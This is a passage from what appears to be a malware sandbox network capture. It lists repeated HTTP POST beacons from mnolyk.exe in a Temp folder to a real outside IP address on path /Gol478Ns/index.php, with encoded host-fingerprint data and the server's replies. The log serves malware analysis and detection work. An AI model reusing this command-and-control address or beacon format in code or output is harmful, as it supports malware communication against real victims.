                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:46.996388912 CET | 642 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:46 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        442 | 192.168.2.5 | 50132 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:47.164865017 CET | 642 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:47.230132103 CET | 643 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:47 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        443 | 192.168.2.5 | 50133 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:47.416110039 CET | 643 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:47.481126070 CET | 644 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:47 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        444 | 192.168.2.5 | 50134 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:47.648864031 CET | 644 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:47.712028027 CET | 645 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:47 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        445 | 192.168.2.5 | 50135 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:47.882066965 CET | 645 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:47.944685936 CET | 646 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:47 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        446 | 192.168.2.5 | 50136 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:48.120124102 CET | 646 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:48.184925079 CET | 647 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:48 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        447 | 192.168.2.5 | 50137 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:48.518585920 CET | 647 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:48.596528053 CET | 648 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:48 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        448 | 192.168.2.5 | 50138 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:48.816931963 CET | 648 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:48.882236004 CET | 649 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:48 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        449 | 192.168.2.5 | 50139 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:49.109385967 CET | 649 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:49.174504995 CET | 650 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:49 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        45 | 192.168.2.5 | 49735 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:51.844624043 CET | 246 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:51.910830021 CET | 246 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:51 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        450 | 192.168.2.5 | 50140 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:49.757097960 CET | 650 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:49.820137978 CET | 651 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:49 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        451 | 192.168.2.5 | 50141 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:50.069927931 CET | 651 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:50.136013031 CET | 652 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:50 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        452 | 192.168.2.5 | 50142 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:50.911528111 CET | 652 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:50.975814104 CET | 653 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:50 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        453 | 192.168.2.5 | 50143 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:51.490211964 CET | 653 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:51.556133986 CET | 654 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:51 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        454 | 192.168.2.5 | 50144 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:51.746608973 CET | 654 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:51.812130928 CET | 655 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:51 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        455 | 192.168.2.5 | 50145 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:51.997575045 CET | 655 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:52.062042952 CET | 656 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:52 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        456 | 192.168.2.5 | 50146 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:52.228127956 CET | 656 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:52.292440891 CET | 657 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:52 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        457 | 192.168.2.5 | 50147 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:52.469913960 CET | 657 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:52.534677982 CET | 658 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:52 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        458 | 192.168.2.5 | 50148 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:52.713607073 CET | 658 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:52.778877020 CET | 659 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:52 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        459 | 192.168.2.5 | 50149 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:52.948054075 CET | 659 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
